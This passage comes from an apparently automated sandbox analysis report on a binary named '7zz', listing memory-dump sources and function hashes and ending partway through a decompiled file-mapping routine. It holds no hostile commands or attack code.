                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                      • Instruction ID: cf6b0b7c12e853c3d5f2bfce7b0d2bdeef6eab3eb2089ac6725cfe266f892559
                                                                      • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                                                                      • Instruction Fuzzy Hash: A9B19F71A0020ADFDB15CF04D5D0AA9BBA1FF58318F24C1AEC85A4B742E735EE46CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00467420 Relevance: .2, Instructions: 212COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f19d16c577e8e96f48197a8d4ea19eb6042dc0009dded39ed79d713b393dfd92
                                                                      • Instruction ID: bf7e81f7d522a4bd2434b6218b300959f5d02f60473a9509597fbdb11facc58e
                                                                      • Opcode Fuzzy Hash: f19d16c577e8e96f48197a8d4ea19eb6042dc0009dded39ed79d713b393dfd92
                                                                      • Instruction Fuzzy Hash: D0917FB29083658FC315DF49D88455AF7E1BFC4314F0B86AEE9995B322E270A905CFD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00458B30 Relevance: .2, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
                                                                      • Instruction ID: fa9aeb9e0725e4ffef27b0fed8173ebd3e95ce29c77f6e3ebb7612827f398593
                                                                      • Opcode Fuzzy Hash: 5b57f3487a312c1843c0612d4d0dfe37813ac96ab5f28ab3a19bd00fed39ce45
                                                                      • Instruction Fuzzy Hash: 2C510AB2B087514BD308DE6DCC9073AB6D2EBD4304F48863EE496D3385EA78DA1987D5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00467220 Relevance: .2, Instructions: 167COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f8c2fe7712ed8c324610458340f6dfe7cc075e40e23d43facc7c46b85be0f4af
                                                                      • Instruction ID: ecbefbb19e359fe605fb64fccd1c45d94721ec601b361607b774bfcf3dbab90b
                                                                      • Opcode Fuzzy Hash: f8c2fe7712ed8c324610458340f6dfe7cc075e40e23d43facc7c46b85be0f4af
                                                                      • Instruction Fuzzy Hash: 026148725087118FC318DF49D48494AF3E1FFC8328F1A8A6DEA885B361D771E959CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004677D0 Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a36bb598b2f6ffa26dc0ad72d3b0d69c2e5a9c4510fe4b52411aaaf790342bc6
                                                                      • Instruction ID: 438bb65c29240fe6531fe6a72d8d89a3992cb7e1a35f4f069cc153bc5eaea4f0
                                                                      • Opcode Fuzzy Hash: a36bb598b2f6ffa26dc0ad72d3b0d69c2e5a9c4510fe4b52411aaaf790342bc6
                                                                      • Instruction Fuzzy Hash: D561835510DBD59AC326CF3998900A5FFF0AE67101708879DE8E543F86C228F668CBF6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00459F80 Relevance: .2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
                                                                      • Instruction ID: fd88af4a55426da6948f54a871f8da9c8cc7ad7d325161158fb5f24926afe266
                                                                      • Opcode Fuzzy Hash: e6b86c033f61a550a540284f83686b7dc165fdcb51ba861993bc3e277ac7de85
                                                                      • Instruction Fuzzy Hash: CE512B75610B098FC724CF29C48066BB3E2FB88305B148A2ED99787B86DB75E859CB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00456830 Relevance: .1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d037a9f2a6bac70cdbc0ea4a6beeae294910fb94d9119d9e185bc861c6541ff
                                                                      • Instruction ID: 64b7cb02cb4575982e1680b9360a4aaf235b5430a9cb7fa29c26ced03b2a631a
                                                                      • Opcode Fuzzy Hash: 4d037a9f2a6bac70cdbc0ea4a6beeae294910fb94d9119d9e185bc861c6541ff
                                                                      • Instruction Fuzzy Hash: BA41D471B20A201AB30CCF3A8CC41662BC3D7CA39A745C73EC595C66D9DABDC517C6A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004217DA Relevance: .1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
                                                                      • Instruction ID: 58285889abc0c4558893f753c2962dba04340085c6fb08ee3641d5c85bffa47e
                                                                      • Opcode Fuzzy Hash: 23c8aaa3664de804fa2ce29b316b560c6082957a249a83d654323075b2432b7d
                                                                      • Instruction Fuzzy Hash: 92318C7BE75C3402E388883ACC233A7504397D5734B6ED3797C76EA2D9EDAD98810194
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046A2A0 Relevance: .1, Instructions: 95COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
                                                                      • Instruction ID: 55640d85d086321eab8c1dde6dfc87ccde0e417aff073f041b781c99bee8189f
                                                                      • Opcode Fuzzy Hash: d9ad90c045aee2e314f446bae37fd2ae8d495a05db838e50cc6b87b586cac8e5
                                                                      • Instruction Fuzzy Hash: 86314DB1E046B606F3109E3F8C4012AB7D3AFC2211F18C6BAE5954B78AEA359592C756
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004729A3 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                      • Instruction ID: 5cb57f84dd04878d09e3172b721f2800985639ad8fca4f63b4680496e6127096
                                                                      • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                      • Instruction Fuzzy Hash: 2441C360C14F9652EB234F7CC842272B320BFAB204F00D76AFDD1B9923FB726544A255
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00447150 Relevance: .1, Instructions: 87COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b71167f41ca9b4d6a0c5eec9fd16e49cfac46e0cfb7b91671476faf95e24c566
                                                                      • Instruction ID: 6d1edcbece74eb57210dc0e7beee4c9fd278fcd77491b57e59e489f7b1564d5e
                                                                      • Opcode Fuzzy Hash: b71167f41ca9b4d6a0c5eec9fd16e49cfac46e0cfb7b91671476faf95e24c566
                                                                      • Instruction Fuzzy Hash: A2217135708A468FD728DE59D89042BB3D2EFD9300B14893EE59AC7341DB34ED16CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004075F5 Relevance: .1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f56a834658a142d23c883f927dcf220af920912c48db6f46e73b3a04251ebec
                                                                      • Instruction ID: 60f2abb042d568358b40e754ba457d932247b1fa21c2b58f39a36cc5b0bafb4f
                                                                      • Opcode Fuzzy Hash: 4f56a834658a142d23c883f927dcf220af920912c48db6f46e73b3a04251ebec
                                                                      • Instruction Fuzzy Hash: 74210D6E374D0607A71C8B69AD776B921C1E346309788A03EE68BC53C1EF6C9895C14E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00459E70 Relevance: .1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
                                                                      • Instruction ID: c9cb9fdb4045278a2449ae7dde7cf1f47b93b7590a933fb60e95c99ee0c0d7ef
                                                                      • Opcode Fuzzy Hash: 772e87da75b6b7c62898645b4c777575a3ccfa1faee4ffe1159f4fb115bb9a44
                                                                      • Instruction Fuzzy Hash: 4A11E97E270D0647A75C876DAC336B921C1E784309798A13DE54BCA3C2EF6EC896C648
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00472B30 Relevance: .1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
                                                                      • Instruction ID: 841e742ca2b343ce69cf51eeea2c428e43b70acb97c5447e4c3c03e40b730c9e
                                                                      • Opcode Fuzzy Hash: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
                                                                      • Instruction Fuzzy Hash: 1E21C832D046254BC752CE6DE5C45A7F3D1FBC436AF578627ED8867290C528B85486E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00472C0B Relevance: .1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                      • Instruction ID: 3aa8b7520b6c29b039fcb8c41eb560a1c276bd8b531b3edbaf52973018cb75c7
                                                                      • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                      • Instruction Fuzzy Hash: 252149725104254FC302DF2DE5886BBB3E1FFE4319F63CA3BD9858B281C628D844D6A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00410DFA Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 183fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00410DFA(intOrPtr __ecx, void* __edx) {
				void* _t63;
				void* _t68;
				void* _t75;
				long _t76;
				void* _t83;
				void* _t90;
				void* _t134;
				void* _t135;
				long _t142;
				signed int _t144;
				void* _t145;
				void* _t147;
				void* _t149;

				E0046B890(E00474220, _t147);
				 *((intOrPtr*)(_t147 - 0x10)) = _t149 - 0x58;
				_t134 = __edx;
				 *((intOrPtr*)(_t147 - 0x20)) = __ecx;
				_t63 = E00411BA8(__edx, 0x3a, 0);
				_t138 = _t63;
				if(_t63 < 0) {
					L0040FFF2();
				}
				E00407399(_t134, _t147 - 0x64, _t138);
				 *(_t147 - 4) = 0;
				E004072C9(_t134, _t147 - 0x40, _t138 + 1);
				 *(_t147 - 4) = 1;
				_t68 = E00411BA8(_t147 - 0x40, 0x3a, 0);
				_t140 = _t68;
				if(_t68 < 0) {
					L0040FFF2();
				}
				E00407399(_t147 - 0x40, _t147 - 0x58, _t140);
				 *(_t147 - 4) = 2;
				E004072C9(_t147 - 0x40, _t147 - 0x4c, _t140 + 1);
				 *(_t147 - 4) = 3;
				_t142 = E004082A1( *((intOrPtr*)(_t147 - 0x58)), 0);
				 *(_t147 - 0x24) = 0;
				 *(_t147 - 0x18) = 0;
				_t131 = _t147 - 0x64;
				 *(_t147 - 4) = 4;
				_t75 = OpenFileMappingA(4, 0,  *(E0041AE3F()));
				 *(_t147 - 0x18) = _t75;
				if(_t75 == 0) {
					_t76 = GetLastError();
				} else {
					_t76 = 0;
				}
				 *((char*)(_t147 - 0x11)) = _t76 != 0;
				E00407A18( *((intOrPtr*)(_t147 - 0x34)));
				if( *((intOrPtr*)(_t147 - 0x11)) != 0) {
					L0040FFFD("Can not open mapping");
				}
				_t135 = MapViewOfFile( *(_t147 - 0x18), 4, 0, 0, _t142);
				 *(_t147 - 0x24) = _t135;
